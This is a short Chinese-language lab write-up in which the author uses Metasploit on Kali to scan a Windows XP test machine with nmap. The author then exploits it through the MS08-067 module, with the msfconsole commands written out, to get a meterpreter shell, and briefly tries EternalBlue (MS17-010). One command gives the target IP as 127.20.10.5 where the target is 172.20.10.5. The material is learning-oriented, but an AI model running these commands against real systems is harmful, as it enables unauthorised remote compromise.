没网闲着无聊,灵魂无处安放呀,就简单的用metasploit玩玩。
实验环境:
目标主机:Windows XP professional
攻击机: kali linux
1.漏洞扫描
nmap --script=vuln 172.20.10.5
扫描结果提示,易受攻击的有:
1.CVE-2008-4250 Microsoft Windows系统易受远程代码执行攻击(MS08-067)
2.CVE-2017-0143 Microsoft SMBV1服务器中的远程代码执行漏洞(MS17-010)
以上述两个为例学习使用metasploit漏洞利用模块进行攻击:
2.漏洞利用
实例一:使用MS08-067模块进行攻击测试
命令:
启动Metasploit:msfconsole
msf5 >:search ms08_067 /*查找可用的攻击模块*/
msf5 >:use exploit/windows/smb/ms08_067_netapi //使用模块
输入info 可用目标主机,本次环境目标为34 ,设置目标环境set target 34
显示payload 需要设置的项,如下图需要设置目标主机,设置好后执行攻击
msf5 >:set target 34 //设置目标主机的系统版本,防止语言导致攻击失败
msf5 >:show payload //显示需要设置的项
msf5 >:set rhost 127.20.10.5 //设置目标主机Ip
msf5 >:exploit //执行攻击
成功后meterpreter输入shell即可远程执行相关任务,查看用户名等操作。
实例二:利用MS17-010进行攻击测试,同里查看可用的攻击模块
同样的我们这次选用eternalblue smb远程windows内核池破坏
设置好相关参数后开始执行攻击,由于目标主机重启后未激活,导致利用漏洞攻击成功,但未能建立会话,目标主机正常启动就能成功建立会话。
系统未激活导致无法进入,建立连接。
总体来说在漏洞测试方面,metasploit是非常强,简单高效的操作提高工作效率